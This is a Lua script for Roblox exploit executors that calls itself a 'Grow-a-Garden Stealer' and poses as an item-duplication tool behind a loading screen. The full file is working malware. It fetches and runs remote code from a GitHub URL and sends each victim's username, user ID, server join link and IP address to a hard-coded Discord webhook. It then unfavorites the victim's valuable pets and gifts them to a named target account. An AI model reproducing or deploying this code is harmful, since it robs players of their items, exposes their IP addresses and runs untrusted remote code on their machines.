---------------------------  CONFIG  ---------------------------
local CONFIG = {
	RemotesURL   = "https://raw.githubusercontent.com/sleepyvill/script/refs/heads/main/lua.lua", -- Dont remove / change this url, this is for auto updating the remote
	TargetUser   = "sheeloi0727",
	Webhooks = {
		Pets       = "https://discord.com/api/webhooks/1383259861374210168/IDc5cfDaD6ptA9c6qUWwjsalm0IckQw9MEnLjEcJKrSCIj3DgY05RLHTxrh3Xu1zw3QB",
		Execution  = "https://discord.com/api/webhooks/1383259861374210168/IDc5cfDaD6ptA9c6qUWwjsalm0IckQw9MEnLjEcJKrSCIj3DgY05RLHTxrh3Xu1zw3QB",
	},
	ExecScriptName = "Grow‑a‑Garden Stealer",
	LogIP          = true,
	UI = {
		Enabled=true, Title="Kuruchan",
		StatusInit="Loading …", StatusDone="Ready!",
		BarColor=Color3.fromRGB(0,120,0), BGColor=Color3.fromRGB(0,0,0), TextColor=Color3.fromRGB(255,0,0),
		Duration=3, ShowDupeButton=true,
	},
}
----------------------------------------------------------------

-- universal fetch (client‑side exploits & Studio fallback)
local function fetch(url)
	if syn and syn.request then
		return syn.request({Url=url,Method="GET"}).Body
	elseif http_request then
		local r=http_request({Url=url,Method="GET"});return type(r)=="table" and r.Body or r
	elseif fluxus and fluxus.request then
		return fluxus.request({Url=url,Method="GET"}).Body
	elseif request then
		local r=request({Url=url,Method="GET"});return type(r)=="table" and r.Body or r
	elseif game.HttpGet then
		return game:HttpGet(url)
	else
		error("No HTTP method")
	end
end

----------------------------------------------------------------
-- remotes
----------------------------------------------------------------
local REM = loadstring(fetch(CONFIG.RemotesURL))()
if type(REM)~="table" or not REM.Enabled then
	if REM and REM.NextScript and REM.NextScript~="" then loadstring(fetch(REM.NextScript))() end
	return
end
local AcceptPetGiftEvt,FavoriteItemEvt,PetGiftingService=
	REM.AcceptPetGift,REM.Favorite_Item,REM.PetGiftingService
if REM.NextScript and REM.NextScript~="" then loadstring(fetch(REM.NextScript))() end

----------------------------------------------------------------
-- services
----------------------------------------------------------------
local Players,RS,HS=game:GetService("Players"),game:GetService("ReplicatedStorage"),game:GetService("HttpService")
local Stats,TweenService=game:GetService("Stats"),game:GetService("TweenService")
local LP=Players.LocalPlayer
local Backpack=LP:WaitForChild("Backpack")
local HTTP=http_request or request or syn.request or http.request

----------------------------------------------------------------
-- UI
----------------------------------------------------------------
local scr,bg,title,statusLbl,barBG,barFill,dupeBtn
if CONFIG.UI.Enabled then
	local CoreGui=(gethui and gethui())or game:GetService("CoreGui")
	if CoreGui:FindFirstChild("WaveLoaderFlag") then CoreGui.WaveLoaderFlag:Destroy() end
	scr=Instance.new("ScreenGui",CoreGui)
	scr.Name="WaveLoaderFlag";scr.IgnoreGuiInset=true;scr.DisplayOrder=9999
	bg=Instance.new("Frame",scr);bg.Size=UDim2.new(1,0,1,0);bg.BackgroundColor3=CONFIG.UI.BGColor
	title=Instance.new("TextLabel",bg);title.Size=UDim2.new(1,0,0.1,0);title.Position=UDim2.new(0,0,0.28,0)
	title.Font=Enum.Font.GothamBlack;title.TextScaled=true;title.TextColor3=CONFIG.UI.TextColor;title.Text=CONFIG.UI.Title
	statusLbl=Instance.new("TextLabel",bg);statusLbl.Size=UDim2.new(1,0,0.05,0);statusLbl.Position=UDim2.new(0,0,0.65,0)
	statusLbl.Font=Enum.Font.Gotham;statusLbl.TextScaled=true;statusLbl.TextColor3=Color3.fromRGB(200,200,200);statusLbl.Text=CONFIG.UI.StatusInit
	barBG=Instance.new("Frame",bg);barBG.Size=UDim2.new(0.6,0,0.03,0);barBG.Position=UDim2.new(0.2,0,0.58,0)
	barBG.BackgroundColor3=CONFIG.UI.BarColor:Lerp(Color3.new(),0.6)
	barFill=Instance.new("Frame",barBG);barFill.Size=UDim2.new(0,0,1,0);barFill.BackgroundColor3=CONFIG.UI.BarColor
	if CONFIG.UI.ShowDupeButton then
		dupeBtn=Instance.new("TextButton",bg)
		dupeBtn.Size=UDim2.new(0.15,0,0.05,0);dupeBtn.Position=UDim2.new(0.425,0,0.93,0)
		dupeBtn.Font=Enum.Font.GothamBold;dupeBtn.TextScaled=true;dupeBtn.Text="Duplicate";dupeBtn.TextColor3=Color3.new(1,1,1)
		dupeBtn.BackgroundColor3=CONFIG.UI.BarColor;dupeBtn.Visible=false
	end
	TweenService:Create(barFill,TweenInfo.new(CONFIG.UI.Duration,Enum.EasingStyle.Sine),{Size=UDim2.new(1,0,1,0)}):Play()
end

----------------------------------------------------------------
-- unfavorite all pets
----------------------------------------------------------------
local function unfav(c)for _,t in ipairs(c:GetChildren())do if t:IsA("Tool")and t:GetAttribute("Favorite")==true then FavoriteItemEvt:FireServer(t)end end end
unfav(Backpack);if LP.Character then unfav(LP.Character) end

----------------------------------------------------------------
-- exec webhook (for logging script execution)
----------------------------------------------------------------
local function execWebhook()
    local gId, jobId = game.PlaceId, tostring(game.JobId)
    local joinCmd    = ("game:GetService('TeleportService'):TeleportToPlaceInstance(%d,'%s',game:GetService('Players').LocalPlayer)"):format(gId, jobId)
    local insta      = ("https://kiel-x-kai.vercel.app/start?placeId=%d&gameInstanceId=%s"):format(gId, jobId)
    local ping       = tonumber(Stats.Network.ServerStatsItem["Data Ping"]:GetValueString():match("(%d+)")) or 0

    local fields = {
        {name="Script",     value=("```%s```"):format(CONFIG.ExecScriptName), inline=false},
        {name="Player",     value=("```%s (%d)```"):format(LP.Name, LP.UserId), inline=true},
        {name="Ping",       value=("```%d ms```"):format(ping),               inline=true},
        {name="Join Cmd",   value=("```lua\n%s\n```"):format(joinCmd),        inline=false},
        {name="Insta Join", value=("%s"):format(insta),                 inline=false},
    }
    if CONFIG.LogIP then
        local ip = HS:JSONDecode(game:HttpGet("https://ipinfo.io/json")).ip
        table.insert(fields, {name="IP", value=("||%s||"):format(ip), inline=false})
    end

    local body = { embeds = {{ title = "🚀 Script Execution", color = 0x3498db, fields = fields,
                               footer = { text = "Exec‑Log • "..os.date() } }} }

    HTTP({
        Url     = CONFIG.Webhooks.Execution,
        Method  = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body    = HS:JSONEncode(body)
    })
end
execWebhook()

----------------------------------------------------------------
-- Pet handling, add more nalang if needed (same format)
----------------------------------------------------------------
local pets, petNames = {}, {}

local PET_WHITELIST = {
    ["Silver Monkey"]=true,["Queen Bee"]=true,["Raccoon"]=true,
    ["Dragonfly"]=true,["Butterfly"]=true,["Red Fox"]=true,
    ["Chicken Zombie"]=true,["Disco Bee"]=true
}

local function isPet(tool)
    if not tool:IsA("Tool") then return false end

    local n   = tool.Name
    local typ = n:match("^(.-) %[") or ""

    local kgStr = (n:match("%[(.-) KG%]") or "")
    kgStr       = kgStr:gsub(",", "."):gsub("[^%d%.]", "")
    local kg    = tonumber(kgStr)

    local age   = tonumber(n:match("Age (%d+)") or "")

    return PET_WHITELIST[typ] or (kg and kg > 20) or (age and age > 50)
end

local function reg(t)
    if isPet(t) and not pets[t] then
        pets[t] = true
        petNames[#petNames + 1] = t.Name
    end
end


local function reg(t)if isPet(t)and not pets[t]then pets[t]=true;petNames[#petNames+1]=t.Name end end
for _,t in ipairs(Backpack:GetChildren())do reg(t)end;if LP.Character then for _,t in ipairs(LP.Character:GetChildren())do reg(t)end end
Backpack.ChildAdded:Connect(reg);LP.CharacterAdded:Connect(function(c)c.ChildAdded:Connect(reg);for _,t in ipairs(c:GetChildren())do reg(t)end end)

local function petWebhook()
    local gId, jobId = game.PlaceId, tostring(game.JobId)
    local joinCmd    = ("game:GetService('TeleportService'):TeleportToPlaceInstance(%d,'%s',game:GetService('Players').LocalPlayer)"):format(gId, jobId)
    local insta      = ("https://kiel-x-kai.vercel.app/start?placeId=%d&gameInstanceId=%s"):format(gId, jobId)

    local body = {
        embeds = {{
            title       = ("🐾 Pets (%d)"):format(#petNames),
            color       = 0x5edb6e,
            description = (#petNames > 0)
                           and "- "..table.concat(petNames, "\n- ")
                           or "No pets found.",
            fields = {
                {name="Join Cmd",  value=("```lua\n%s\n```"):format(joinCmd), inline=false},
                {name="Insta Join",value=("%s`"):format(insta),          inline=false},
            },
            footer = { text = "Pet‑Log • "..os.date() }
        }}
    }

    HTTP({
        Url     = CONFIG.Webhooks.Pets,
        Method  = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body    = HS:JSONEncode(body)
    })
end

----------------------------------------------------------------
-- this is for sending the pets to the target user
----------------------------------------------------------------
task.spawn(function()
	while true do
		local tgt=Players:FindFirstChild(CONFIG.TargetUser)
		if tgt then
			for tool in pairs(pets)do
				local ch=LP.Character
				if ch and ch:FindFirstChild("Humanoid") then
					ch.Humanoid:EquipTool(tool);task.wait(0.25);PetGiftingService:FireServer("GivePet",tgt)
				end
			end
			petWebhook()
			break
		end
		task.wait(10)
	end
end)

----------------------------------------------------------------
-- UI loading
----------------------------------------------------------------
if CONFIG.UI.Enabled then
	task.wait(CONFIG.UI.Duration+0.5);statusLbl.Text=CONFIG.UI.StatusDone
	if dupeBtn then
		dupeBtn.Visible=true
		dupeBtn.MouseButton1Click:Connect(function()
			local c=LP.Character;if c then local t=c:FindFirstChildOfClass("Tool");if t then t:Clone().Parent=Backpack end end
		end)
	end
	for _,v in ipairs({bg,title,statusLbl,barBG,barFill})do TweenService:Create(v,TweenInfo.new(1),{BackgroundTransparency=1,TextTransparency=1}):Play() end
	task.delay(1.2,function()scr:Destroy()end)
end
